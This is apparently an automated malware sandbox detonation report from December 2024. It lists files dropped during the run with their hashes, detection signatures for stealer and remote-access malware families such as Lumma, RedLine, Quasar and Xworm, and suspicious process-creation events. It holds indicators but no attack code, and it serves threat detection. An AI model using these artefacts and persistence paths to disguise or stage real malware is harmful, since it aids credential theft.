SHA512 f76b8972e2175fd84a56b3139c31a87fbfafd69e131da46a96225ba9cce9a4a726fb007b31de08406c9b3f51d8fd0fd32827a485c668d9c92b54f24f1384bc53

C:\Windows\WinSxS\Temp\InFlight\753cff0bc34cdb015c000000640f901a\753cff0bc34cdb015d000000640f901a_manifest

MD5 53094430f66951325c1b88a4f0ca374d
SHA1 f081561658705610adad4c30e757312491edf9e0
SHA256 4594558e51587c0edf1f3f95a0d4b8749b3ea3b6c8b76b31b13f1ca1d3e2f4af
SHA512 75ead79c7392de2be0964d0399da4b6b883bfc1e53cb099ec6bf2e4da594b24b52e1c08ab6ba5b0b18df7e64dac0979c2a57e0b20ee6fdd5d54340fff8f6d462

C:\Windows\WinSxS\Temp\InFlight\753cff0bc34cdb015c000000640f901a\753cff0bc34cdb015e000000640f901a_catalog

MD5 93615fe0e4458e717bba670c9b162e84
SHA1 ce99f878d2528efc821d05462313c8ef99be8c2f
SHA256 d14225a52543aa5a9605b00dd7574812bf89c605ebc73a9730e1e386bfc965f8
SHA512 f87ba88b0b2bf186872bdf226ea137463a773b710cd4505e50fd22e7e3e629beab26af32313fe09bb4d1a0c621d95df3e1d0a957d6d5a43868a1c4953ca3343f

C:\Windows\WinSxS\Temp\InFlight\f362250cc34cdb0166000000640f901a\fac4270cc34cdb0168000000640f901a_catalog

MD5 c664656654dab45beb0d352077a884fb
SHA1 5bdb2ee6d91ee321fef177e534c324df96baef9d
SHA256 b3beb16c28db357e654a6b132f59cd48cb95cee949d7b97587f8f02f233f3ce1
SHA512 f9ce3655342a07a29b5338ab5b78ba0b6cbc94eeb1d0538967dd2c23cbbda6797326763e16f609c179b43e67503a87f76d8c306f0ab449f1601f13d7f7173a15

C:\Windows\WinSxS\Temp\InFlight\f362250cc34cdb0166000000640f901a\fac4270cc34cdb0167000000640f901a_manifest

MD5 11d6a2e757da71254bfc61d26f06884d
SHA1 9d82fa5ce12ddfe639af6c89c750758d8e72a20a
SHA256 58ae1580121afe06ce2b858b96b6ab893a8d105b17fe54d85711a969c3303dc4
SHA512 0074430d25861b7b18cfa2c3e5bf728b51b676c5a30799986305be94c40ee1dca8e3c00a6279c801771f44d4ed551f73a0dc5c5792715c1c10361712d9ef8b29

C:\Config.Msi\e5a4d78.rbs

MD5 4e9c844d4d3ab92552ddbe489d386520
SHA1 41639bd096aae3954f5ce6470d87bee74f403007
SHA256 3162c0fbf552d76aff8da0cfcf841228fbe716e81a022606dd7c67e015a17eb9
SHA512 335466f15d8d6496d438d48249079d7782dfdab12f406a33f7ce810e26659e85b0799f09f0dbe556fc5638ddb0f57f1b04d282513efdb422ed3d9f8a043a14e4

C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe

MD5 6e05e7d536b34f171ed70e4353d553c2
SHA1 333750aa2d2121ad3e332ada651add83170b7bf8
SHA256 fd0754a2ef3567859db0bf3c75f18ec50aaeae6a7561aff9e7f6c7775a945ed7
SHA512 148be9744466f83ae89650fa461132266300cea8b08c793a320416f4a71a19fd3caf2e9258664040fcc44c06c77eb84bd5a7d1c47839d147c8ed5b5bee69610f

C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe

MD5 732746a9415c27e9c017ac948875cfcb
SHA1 95d5e92135a8a530814439bd3abf4f5cc13891f4
SHA256 e2b3f3c0255e77045f606f538d314f14278b97fd5a6df02b0b152327db1d0ff6
SHA512 1bf9591a04484ed1dab7becb31cd2143c7f08b5667c9774d7249dbd92cf29a98b4cabfa5c6215d933c99dc92835012803a6011245daa14379b66a113670fbb08

C:\Users\Admin\AppData\Local\Temp\a\leto.exe

MD5 a0507bfe0c6732252a9482eb0dd4eb0c
SHA1 af318e66c86daf48a5dc8511a5e2a0c870edd05d
SHA256 c3ee04588440b04a39dd6a603e91492f9f52fb20c7a43dcdc606b227742a097e
SHA512 4e4f699aa5cdca9d296bc6f3e3d9ef824430bbaa14db27aeb973f7bf576900fc5ca33946034475bfe696bac026cab14f0addf93018e7099a1b04ebc3a75a2c97

C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe

MD5 2cbd6ad183914a0c554f0739069e77d7
SHA1 7bf35f2afca666078db35ca95130beb2e3782212
SHA256 2cf71d098c608c56e07f4655855a886c3102553f648df88458df616b26fd612f
SHA512 ff1af2d2a883865f2412dddcd68006d1907a719fe833319c833f897c93ee750bac494c0991170dc1cf726b3f0406707daa361d06568cd610eeb4ed1d9c0fbb10

C:\Windows\SysWOW64\directx\websetup\dsetup.dll

MD5 984cad22fa542a08c5d22941b888d8dc
SHA1 3e3522e7f3af329f2235b0f0850d664d5377b3cd
SHA256 57bc22850bb8e0bcc511a9b54cd3da18eec61f3088940c07d63b9b74e7fe2308
SHA512 8ef171218b331f0591a4b2a5e68dcbae98f5891518ce877f1d8d1769c59c0f4ddae43cc43da6606975078f889c832f0666484db9e047782e7a0ae4a2d41f5bef

C:\Windows\SysWOW64\directx\websetup\dsetup32.dll

MD5 a5412a144f63d639b47fcc1ba68cb029
SHA1 81bd5f1c99b22c0266f3f59959dfb4ea023be47e
SHA256 8a011da043a4b81e2b3d41a332e0ff23a65d546bd7636e8bc74885e8746927d6
SHA512 2679a4cb690e8d709cb5e57b59315d22f69f91efa6c4ee841943751c882b0c0457fd4a3376ac3832c757c6dfaffb7d844909c5665b86a95339af586097ee0405

C:\Windows\System32\Tasks\skotes

MD5 117e76b5b31d6005009da6e31a063f91
SHA1 d993d259fe6e1752c88a97391f05707fef9e1fac
SHA256 3fd7a754413c9ed99899842dba33254274cb2f51de4ee54df0ce337628866d13
SHA512 eff612a0f4a0fbd96f8421e9fcb429819835e474a06512f0fd6b4762ec5d49ea2a3ae2607e86f3f25cee1323dc1e9c25bb0637e6eabbae3bb368b0677b48267c

C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe

MD5 f0aaf1b673a9316c4b899ccc4e12d33e
SHA1 294b9c038264d052b3c1c6c80e8f1b109590cf36
SHA256 fcc616ecbe31fadf9c30a9baedde66d2ce7ff10c369979fe9c4f8c5f1bff3fc2
SHA512 97d149658e9e7a576dfb095d5f6d8956cb185d35f07dd8e769b3b957f92260b5de727eb2685522923d15cd70c16c596aa6354452ac851b985ab44407734b6f21

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

MD5 7229bce5ce94ad8c3efdac6116ca0dfd
SHA1 bab536edb7b176deedc34f51bca00786358a9238
SHA256 786cacdf01a6f995fa366ec96f869e36aea02b478426595de4d72ce297b92312
SHA512 147165e60b94781f32180d41107d81504cf6c8a08a7b235c0680af1708447341ab6cb42e4d8ba310b4425d30bb4961f91da1801f45285f32974ccd9f5a419f4b

C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe

MD5 78c586522f986994aa77c466c9d678a8
SHA1 4b9b13c3782ae532a140a33ba673dc65a37aa882
SHA256 498ac6b747691eb456fc24ac26c3932effca9b46e39740963120f711e72aefc9
SHA512 707ff5fcbb5e473583bec2d54aac25a3febe262c06025c9d88ddd5d30449b1454289eaa63bec848ca69147232474731052bef710e60c042d0c80e9c02486b5bb

C:\Users\Admin\AppData\Local\Temp\a\XClient.exe

MD5 015a5ef479c8d3e296e6a99e0fa7df6a
SHA1 69f188973fdc12d282e490041d18b01c0d49752d
SHA256 c73ff8630476795ba4dde19e7763d1aae50978b0b9b029cd71828a2da3c2197c
SHA512 4c692aaff1607cf402ed7acc2f91f587229bfface6f75ae8329e031d69437f43291b186e9ca4bcdea595145ea50f3e23d064306e9a8d83a8848cf9096146e46a

C:\Users\Admin\AppData\Local\Temp\a\laz.exe

MD5 0a3457f3fb0d5c837200b2849e85b206
SHA1 851c4add14eabb3b549666d2494ddcc4ebaf40b9
SHA256 aaeb0f22d9625f23135bc86f9ed7d5a877153732b9f24d3e416fe9fc7e532080
SHA512 9610c9e53770f451b9d686d39b4475fed85ef443db663d1a4945aca19f940a9f24cda9907fabecb27304e5b4f52c8b13cf00d8385e55a1edbb3eebaf78ab7cbd

C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe

MD5 e9fb13875b744fa633d1a7a34b0f6a52
SHA1 f0966985745541ba01800aa213509a89a7fdf716
SHA256 fb8fb89b5f56ce2acd9668021a470a18b7898808750800861151e908d5b1a20e
SHA512 c2feda22e23fda47f0b0ede38f5f432a656a5e7598c7a9d3d4e8babf9ff94189b69f4f4a3894c094260c3b72d21888720f60ed7ee2c018c8aced9d754e03e292

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 f25e48e1d9e1e1398bc5fbc6885570b8
SHA1 46557c8ebb9236af6c28c9bdd317d1d25749e710
SHA256 0379e6a5dff30a991e0acdb9932cac828eb3e30ca8cc23447a2bc73ae78181db
SHA512 41e61480f5141b6950d7b96f3e4dfcca19bc480e0b11eeebdedaeb266c6e525f41f3d29a3c1c0bf8f17a3c30111d8fba7e269d5fcf84b336bee916e21881acb7

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 2e02c8ed2cf16bca0c1a18665f069550
SHA1 1d1a4c7059a878b9196e7858297062753c75e5eb
SHA256 81c204b50db0c74c5040725788cec813370dd02f521b11e6a5123ff96f483b0f
SHA512 2cf38caa59b08a837d7bd287f0ec22f6c166a8269d004eb59f5bb7de0e2ed0fd6b31df7b6224d27ac79fc8720f10a1c7697b8aa62acd88138e0ab977baf6a97b

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 9196412195f67035846651ed3580203d
SHA1 5536bf9a7d266630738cf482bd4884e1cc4e11ae
SHA256 e36d96315296eea3d5e19cce81537002d313a57899efc21a6a9e71dedd07ec14
SHA512 339ef42bb92c5e2a0f3e91e326a6d57b397f513bddda4d07a334a20bbf8fcbff132005c12d5e596ea020f571a90d52522035bfa028aa7e1311dddbf89c4117fe

C:\Users\Admin\AppData\Local\Temp\gcapi.dll

MD5 1ce7d5a1566c8c449d0f6772a8c27900
SHA1 60854185f6338e1bfc7497fd41aa44c5c00d8f85
SHA256 73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf
SHA512 7e3411be8614170ae91db1626c452997dc6db663d79130872a124af982ee1d457cefba00abd7f5269adce3052403be31238aecc3934c7379d224cb792d519753

C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe

MD5 ab3f75f41982ca216badc3e56f9d3e88
SHA1 ee26477ee9d90af2e940e6f99617e7d54b241635
SHA256 e47e8c01326ac9c785f3edcd04fb360333a5904854c69d464f8321a27f5d0c08
SHA512 6325f73f6d82424aaa64132fb37b0c7713fc53faa304da8d63a71c757cfd4dcdccac925650bf763188d913c9562e37f2a500ad7bb80d7b9f6aa456c43bfe8822

C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe

MD5 0c1a360f7ca0e6289d8403f1ebfa4690
SHA1 891483904f22cf6495bd310c4bf7c05fc42b85ba
SHA256 2d1a3f0c2f05f3d0ee2c4c4d49abd370b0a9e9c811a98c07f8d06c368d46dffe
SHA512 f10cd6843b457e1abb0b43ec716c23e8a093dd46750ea1f378e90108f28fa6c7a02d1b9227b7b9dcf9d2e8de6489cf9f6d1d24381d2aea55e6b9dd3fba55a118

C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe

MD5 c566295ef2f48b51a4932af0aa993e48
SHA1 0b69f71e7f624a8b5f4b502fde9de972a94543ff
SHA256 f096fd252e752b20a37c8963bb0ef947e7a7a1794552db8b5642523db9357d8f
SHA512 d51b8893ce58395dbd03441e59ca367d94a346e4241925db84b88f57209c98ebdc1513942606a4e469bf622968a10f03ce7b10f314d0ddc061675d46f34c8a3c

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

MD5 3f44dd7f287da4a9a1be82e5178b7dc8
SHA1 996fcf7b6c0a5ed217a46b013c067e0c1fe3eba9
SHA256 e8000766c215b2df493c0aa0d8fa29fae04b1d0730ad1e7d7626484dc9d7b225
SHA512 1d6b602bf9b3680d14c3c18d69c2ac446ad2c204fca23da6300b250a2907e24cf14604dc7d6c2649422071169de71d9fc47308bfbbb7304b87d8d238aa419d03

C:\Program Files (x86)\AnyDesk\AnyDesk.exe

MD5 d25c3bd6c96b1d4b95f492a9daa4a6a1
SHA1 9b4f388fec4511ce3fa5bf855626c7c7b517ac21
SHA256 fa0f2e683c50d4908381e6ef16edcec29cc3f1d225b63de58f83d1c9bd854ff9
SHA512 75d26dc48a6446e3bf47c45edd3697d52332106a400f34b4ca7af588e226f5f5563a13156568582b6e5a97edd8f1cf60d1ede7dcb9d5aca9f41eec628a7e041a

C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe

MD5 2ca5f321b0683c4cdd64c2ab7761c2db
SHA1 1af4717e30ee791aa16c88f5d319bc949bdec2d5
SHA256 b19d81651cf60b9a4344f531832e7421a38ab29eaa3946de230ca72e849aa4e4
SHA512 a3f75cf31b96f480ada63a1550fbfad92daf14944e32d142afe35494058f07ce846224aef47dea7ce9da45be5e2008b0b4650e0e12d207842e83b0c6d9be89ff

C:\ProgramData\AnyDesk\system.conf

MD5 25e71767a94343d45dd3e066c05784bf
SHA1 901ae90156458e9b91f29cb0789964a5bfbc1127
SHA256 1b7467f3f2b0a63dc29701aa97c9e7b76757e4aa6c44d61e48e067068ca88525
SHA512 ae538706623ced39a44622e9fd0f0422c4824bf9e8cc2ef6b143458873d142230ad949efeb8651fdba70f9488be935ace6bf40a8da842d74ca7895c85abb4bd6

C:\ProgramData\AnyDesk\system.conf

MD5 4f559d9257cbacf85aaeb62f530c70cd
SHA1 23c369aeb9a8f6e8c036291a159bfa94b7595f91
SHA256 863f86c0cd7c7451faa39ac7d9de56522eae32ba652d1d31d48743295eead598
SHA512 5d92dab2df65e54a3ba445682479f01bd1e620fdcd99b4420ef9fcd0382363004ab439a481e0d6ba79b6831fe899956a611738305fa04fdf18111bae6efe1389

C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe

MD5 8b712dbac428c4107c3c44f92743d8e6
SHA1 65027334951d9be6149627fef6a45f2397cfe747
SHA256 fd1eb7d83a9f704ba4f4ebea145dca07de27d78d622c24b506c9fd0f7dc090f3
SHA512 e162e242fff25aaa8192ce69a5749fa2f6919a3413c158f40b4eb383a24088c7aa321b3286d97723a960a3e9406db8747d752725f981e9c903bada8f1524d22e

C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe

MD5 ac1997ffe0c45d75cec0f1bbfe24cd62
SHA1 67f28f8d9ff0a2f3a6d84948f541b204339a26e4
SHA256 63424ba4e2e4c05fd5f7592d93d611a426c2bfb80f9989ecfd6b34613004614a
SHA512 527856bfb0c7cdd390dd4e868ca9137b27cd1c46c4450f061db7e1d9483403e96dbad56127fb8b186b8a3f3a5b363036e0809e9de8a9973fd89d3a79c1d52144

C:\ProgramData\AnyDesk\system.conf

MD5 97d9059805b59a38cef6036e01ac9056
SHA1 40429fc8a0d83c6f06f35597e86cc27ef34e1603
SHA256 4cef3a4802bc4cdbde24e0870022c2914608d7bdcc268cf0e1b7d99ec3a0ddbc
SHA512 eaf8b96acc2e66ba07c5881de8d2f1d853f9191c494dc436425a297390fd5239fd48ce1dd7cfde0393237dc1811f52822405b5f397cfc15a98f763c04d233041

C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe

MD5 6304ce36f17952d70bceb540d4b916ac
SHA1 737d2ecf8f514e85c2776416100eefb5ea23391c
SHA256 6b0bd6af17d546a941450c6463e3c704810b78910a6f6b31feca4e8a4200db78
SHA512 60674f266829fd74b8d15867193ebbbed77633fe89eee3824ab15d9bc563e684e4f1b3bd2ac34b03d527554f6a4bce7a16fe27c48e06ad5c0e25e3a7e9c8c78e

C:\ProgramData\AnyDesk\system.conf

MD5 9ed325d16cb0cc6ed0fefcee06aa47fc
SHA1 2aaf3518835629d1a47adba5c4d73a85b5d4e946
SHA256 2230585d83a7229c5a871f52ea78b7f4ca6b5c71be3144178a1dfe86a38f2ba6
SHA512 74b2292d029421482901d43d708605073fd1125c052ca3840ab94e1eed7a8f2f7b15364393713514cd7c0bf2a62974e15628e8769b28b534e3a62e8f4e08a289

C:\ProgramData\AnyDesk\system.conf

MD5 b09fc5d84a35b6d89c4996da86fd5bcc
SHA1 910b6098ada9294195a8d035065e2ddc141cec00
SHA256 5666dcda1f34ceda309f7ef55b5d17b14432a2c1568c6b94bdcd9f906ce49037
SHA512 1d22c697e2d5433c2bd4b611154a796aca8bfd778e3ed258db54dc040567e183c51ba5599a3f496d16db63c32769a29145e80784201b6d9fe2421ace5a8fb202

C:\ProgramData\AnyDesk\system.conf

MD5 4d425394019a7614e471dbcdb2eab3ca
SHA1 394b99f56f9824d1bba9fae3e48b6318c2782da8
SHA256 74e9fa94a7466325ee78dccea7fb8bc0893aaa596be54f11a7cd0672d43d2369
SHA512 4d4f2de83b7adcf7c604b2bdea21b00cb30b00e01b9239808f60f3fcb0181df968fd890b6ca38ccb92b8174119d192585409576cf3f70556d74009e5c0eabe05

C:\ProgramData\AnyDesk\system.conf

MD5 8cd44194d707538c7dcdaf49553022bd
SHA1 7cb12f6d48e6567da3c9ae5277a9202555557629
SHA256 736e6d57d96e6226d335fec4cca66fd0b8da17c97b45825f716d01daf418c4b3
SHA512 8953b6cb205d5c92251092ba03c7c13de6118817de9ca90ea1e7e55219d60cdc5d581f76d9f74394f22f5f693933888ee48aa705c8731151dc8f88efa1f51e22

C:\ProgramData\AnyDesk\system.conf

MD5 18596c9502648d76dbd740afb216b780
SHA1 e34c218a9b6092a3f02dd673368c559d0c34d2bb
SHA256 da12f373fbbe5d70cc4910e11575a7d8a700eb74c2918355deb3782b22cbe75f
SHA512 bbfccce590a6c8ff6cdb41b4611b3db5993df470631fa3b50114260a94492f7fb82c15268a11f3b59f1cc05137415bfa32c9d4015a5bdf372d70c9de0fd95e25

C:\ProgramData\AnyDesk\system.conf

MD5 cb6fbf8cbc54e6a02a22c2bdd7aba4d2
SHA1 c607c1c2139b76ef4d821c97bf572458f50af1ba
SHA256 a3fe78f093eb4f873dc4dc54c38ce3edc32d6c71311da788ad35f34568247944
SHA512 a32017c99f3ce240e58e9f98e637a7e816636569f9307fad361feb2e17a22236888270223644aa1e4cb695a361ef94666b86be7c9f059a7273faf14fff5e96c4

C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe

MD5 8e0d340e723ce188de651b8ffb887d81
SHA1 cb90a07f1a4ffae68cca6281325606009d3d7266
SHA256 514c0d56b0b5ea74a2729c99adcc92cd4b51795498281c1675636bb5b9d17cb7
SHA512 d5505ef82f69085b975312255bb733f66a97850ecb6608000ba642ec7d2997a88a184d230c38acfe01a9d33adf0b46b88a59d4b97bf11ae9a45b7b9c7e2904e1

C:\ProgramData\AnyDesk\system.conf

MD5 7ca60496f49b36a55f754ef4e4d796f9
SHA1 e672b9606b4b99b5849b848773c62ce39a0d7446
SHA256 1ea32702f54098c48e469e90a4fdb50c71a7585d76b6f7f72e52b94f667e6a12
SHA512 80cf061f3a88a9964d09ce6395a2857ad1ed1b1611ac6eaef4a95ca1f2ed2580142a041276407fc80e670dad3fd6846e29363cd33d27c67f852cb9a9bcc8cbb1

C:\ProgramData\AnyDesk\system.conf

MD5 f87f3d5de6100718cf2389fcfe5014f6
SHA1 63c292cd701507e3d33a97367d88c56915d45a54
SHA256 5305f4c6adf2d2f367a57cc28d6599b6d0949ec913e742b6ca7c815cf7ff225a
SHA512 bef4476ba269b636c76c38e2a515eb3bffc28ea21cd4e97b1b9a15d57d7f125e394c5b92fd57c1310277438071c4d38bea255445a7605db6a364cf7f3a9f6368

C:\ProgramData\AnyDesk\system.conf

MD5 5f1cc8b91f1fa3f7bf05c943f9bfa405
SHA1 3b67d5f9675883764067d9ce27c451f2b410fbd3
SHA256 f04e6e10b5b459c460d9e9cdc7ee46c2db88521eacfd9ca4a5aa978fce4373e4
SHA512 b7e967c6863b54414984e557a63df26c79514e624e1aba33879f870f5ea6257e35676db6fdc6e700162829de2a90076bb0607d0475e9aa2480e0358b56df1dcc

C:\ProgramData\AnyDesk\system.conf

MD5 9fe4a19e60afbd686376ed11561c60e4
SHA1 465b36378d99f68d150051f74b97f4d40a058edf
SHA256 54c8b81ba485c73c4eef155a429dbbdf7ee13f5e29552cb6c7827c50c64383a3
SHA512 83b96f9b49f4dd56d4136cce2c9511a742dab0ef8b84886fe8381e4d80c47ed2636e5dad829e7c345ffe794870404280895618e7153ae52a0346dca1447a1ada

C:\ProgramData\AnyDesk\system.conf

MD5 68617799427118e67ca7e8e32534d5e2
SHA1 bb48fdc70d6f85bbcf0d6df8ec1fe884b909d732
SHA256 a172eca9aa1203f313aa2260a55370b8f66163e2ab6ccffa5eccf37163464aa5
SHA512 f4e5711e28410bd5f8f44246b208091d642f4bb22233df5b639acde0b3fe290b2d171f4a62dd6540b6dde3abf9b427ebd562c241a5c8854b27417d16aa25bafc

C:\ProgramData\AnyDesk\system.conf

MD5 3a2be1963f060dc0a503bb41cca11d5b
SHA1 9658c4c1394ce01257d94b1f871459477f254f01
SHA256 e54b0d0762b2ec007d6cd730949105af6c1afac4988b336649d3a30230e17295
SHA512 9b2d0f5f3468ebc08bcd0388a3916bf8204e20b3f209e66c8c688fdb28d951701dc9442aa9f9a4ee0a7c963c5d4c2004f32ebadc0d958f38f9ba4c264d092a47

C:\ProgramData\AnyDesk\service.conf

MD5 39447b6c4901c5bf75fd4c451dcaa6f5
SHA1 93cb272e7da05795bcb13589c787952861176699
SHA256 618bd9a73875072a768992de3fab5b12bd64c0b6d14321f13e7a4760b556f734
SHA512 5aa990f2492b78ec8d154329b3de8503448081f4062b34f748a43d99774460dfe1f9ee76ee91a52ff7b3451495149d90d57ce205edbcc4f5a4ab5f077bbb349b

C:\ProgramData\AnyDesk\service.conf

MD5 3d98c6ff7e60e0498d815cb2dfb6f486
SHA1 f9844db3a2aebb4925443e6a6855adb660329e23
SHA256 c917d55804468ad523497c2cff0f4faaf930afbd1ffca82a768c0e9dd1239f8b
SHA512 e8727674c1b528d2d3edc7ad4e8c3f01c7becb8f6a24cc606865a432fc2a049facb9b3bf228d8d4ca4a49361853b07e1d33e3de2c3b8d92a9e9d6bf053cdf20e

C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe

MD5 d9694a6a1989d79aeded3f93cb97d24e
SHA1 a18019b9793029dac4d10e619ec85ea26909336a
SHA256 772c7a131d2a7a239ec39f32214eb94113aacd3984f572fb7e3b1fa1bec98f8c
SHA512 35a29c81d72f0e0bdb169c400dc90bf85859313c250824bf1fbbe362903c63f6a826e94994f8d86e8f56def5ce34cc71a45c6ff936e85fcfe8d169dbdb118168

C:\Users\Admin\AppData\Local\Temp\a\srtware.exe

MD5 e364a1bd0e0be70100779ff5389a78da
SHA1 dd8269db6032720dbac028931e28a6588fca7bae
SHA256 7c8798ab738b8648a5faa9d157c0711be645fabf49c355a77477fb8da5df360e
SHA512 ff2ebfe652cdace05243df45100d5f8e306f65a128ec0b5395d1cc7be429e1b4090f744860963ef9996f74bccee134f198e9a6b0ff14383a404c6e4c9e6ef338

C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe

MD5 2d0600fe2b1b3bdc45d833ca32a37fdb
SHA1 e9a7411bfef54050de3b485833556f84cabd6e41
SHA256 effdea83c6b7a1dc2ce9e9d40e91dfd59bed9fcbd580903423648b7ca97d9696
SHA512 9891cd6d2140c3a5c20d5c2d6600f3655df437b99b09ae0f9daf1983190dc73385cc87f02508997bb696ac921eee43fccdf1dc210cc602938807bdb062ce1703

C:\Users\Admin\AppData\Local\Temp\ ‍ ‎    ‎ \Common Files\Desktop\PingDisconnect.docx

MD5 157d2cbfd55615fe5ca2b0ae21b066a9
SHA1 825856657c8711e9fb4c26db49e234cc24c23509
SHA256 c239c0c41f3a5919581dc83c9bbce497fa0979ed88ab8c1543393da2a3e5ee41
SHA512 14a0dfc952473cbed5e9f856664e3a01e9847d9c90078e29fa001ceeb8a1d641c3f69291955e78962e8fdf525be270814509d83e07df87dc8894130594ab4651

C:\Users\Admin\AppData\Local\Temp\ ‍ ‎    ‎ \Common Files\Desktop\DebugDisable.xlsx

MD5 0d2a1fc5449e8722a23d559eb3ab35fc
SHA1 b6b784ff9157a34892d2415861d53f34e797f8ed
SHA256 22b67a562208e10e3b61e1799f50c2a620e3c7ea8f5bcb4022b1bb926b2a60fe
SHA512 2c818df5ac648778fcc3022c310daed07d2cc93c26bf4c53b076bf5826773d9d5f421c55c1b9d92a1915fb8e9061d4a31eb702859c520880e25c32fafc640bca

C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe

MD5 ff7e78da9c8e580229fe95dfdfe5b098
SHA1 ab968e47e463f29426116753b0ca086fd5b33cdb
SHA256 cefa40083339d42320bc1f9ba33c578b8abe47e15eb0dd6b0ba2f734aa8f3d6d
SHA512 45517b8bc96613daeabb738a42188b8ef19b0ac2b53e3202f7d86f683dacdbe1c4a78414938ab5ad0b48b7c546bc89a78932e3b8a1dbf6604e59b4887de48409

C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe

MD5 d6b16370cd4e60185aa88607316a0c05
SHA1 7fbc63b1203617c67e5491745beaedb424baed78
SHA256 a6d6d1c8299f97f966d72373e999b5a8e6768914e27d5533307cf6878b95dce2
SHA512 16c468948e568343ab1a1460d82b4c5859d09043e3a0115aa9c0aefeabfa22c796cca505ede8b1f194764dda7c5263979230e3fa272ee1fb3b21919202b01906

C:\Users\Admin\AppData\Local\Temp\a\02.08.2022.exe

MD5 12d7ae10b1836cd3091d712723a5a4d6
SHA1 b99fef462f433da1b959c69dfe62703d12464ea7
SHA256 8c56614bca1aaaabe522c46bb14ad9237a9d80783725b729feb4b255c8aca445
SHA512 ab3dd7772ff74a3b48033be5011edc065425e225c5c1c489cd28c6791bd24fc14be01105b97e14dee6ed4b5f453a986048d1a91808619dad518c43065ebc699a

C:\ProgramData\AnyDesk\system.conf

MD5 e437ee3038b3131ac7530b7297d6c680
SHA1 40313dee0933ece473782392e1e6b135a98ffaae
SHA256 a0bb637575c3101133977bad99d853e8c23b7f63f7ad05b4a03e2ac26a220a68
SHA512 8b0db6a42d77d01a1a1c8f584feb59cbc1c776c4cca87cedbc94887892ae569155199c3db344fdb2075e7bf4302fcfdaf9511efca6aa77204607bc1aecf5dd18

C:\ProgramData\AnyDesk\system.conf

MD5 a56ea93ad882910cf87db920b65c691c
SHA1 0b7140fb8ad96c300949dc0c9adc5d6270a2d586
SHA256 9a0c1d4188aa276a71668cdced886a6d8ccf36c6dab65540c2be03513ee91998
SHA512 f1a751cb409ca8f65685eb5edeaa329eb4d42e175625307265d5f43eea04c68a072f0a0228abaff08fb4f471cbfa730b3310dc71124f74c6adb9111d9c2f6758

C:\ProgramData\AnyDesk\service.conf

MD5 8a3ee5e9ae7cefdb20d13a8a5bea198a
SHA1 2a3fe3f4253f73118faeba5940487df2434e3a96
SHA256 a0749b90ce94a1fa159d034860dc3793f6b08d93bbd1dd94933fc8129a4c602a
SHA512 2c7e84d64ba0237a2e7afaa93834da585fde62c290b9518dc6b957c46b838ee8f73a398318cec9ea7551dea78857898816e94ef31a09e8cb1da4403b92e5cca9

Analysis: behavioral6

Detonation Overview

Submitted

2024-12-12 18:20

Reported

2024-12-12 18:25

Platform

win10v2004-20241007-en

Max time kernel

201s

Max time network

300s

Command Line

winlogon.exe

Signatures

44Caliber

stealer 44caliber

44Caliber family

44caliber

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Discord RAT

stealer rootkit rat persistence discordrat

Discordrat family

discordrat

Gurcu family

gurcu

Gurcu, WhiteSnake

stealer gurcu

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RMS

trojan rat rms

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Rms family

rms

Stealc

stealer stealc

Stealc family

stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 5040 created 3436 N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe C:\Windows\Explorer.EXE
PID 6000 created 3436 N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe C:\Windows\Explorer.EXE
PID 816 created 3436 N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe C:\Windows\Explorer.EXE
PID 3020 created 612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe
PID 5476 created 5772 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe
PID 5476 created 1920 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe
PID 5476 created 4892 N/A C:\Windows\System32\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5476 created 4280 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\888.exe
PID 5476 created 4016 N/A C:\Windows\System32\svchost.exe C:\Windows\explorer.exe
PID 5476 created 4548 N/A C:\Windows\System32\svchost.exe C:\Windows\system32\backgroundTaskHost.exe
PID 4464 created 6008 N/A C:\Windows\system32\svchost.exe C:\Windows\SysWOW64\ruts\rutserv.exe
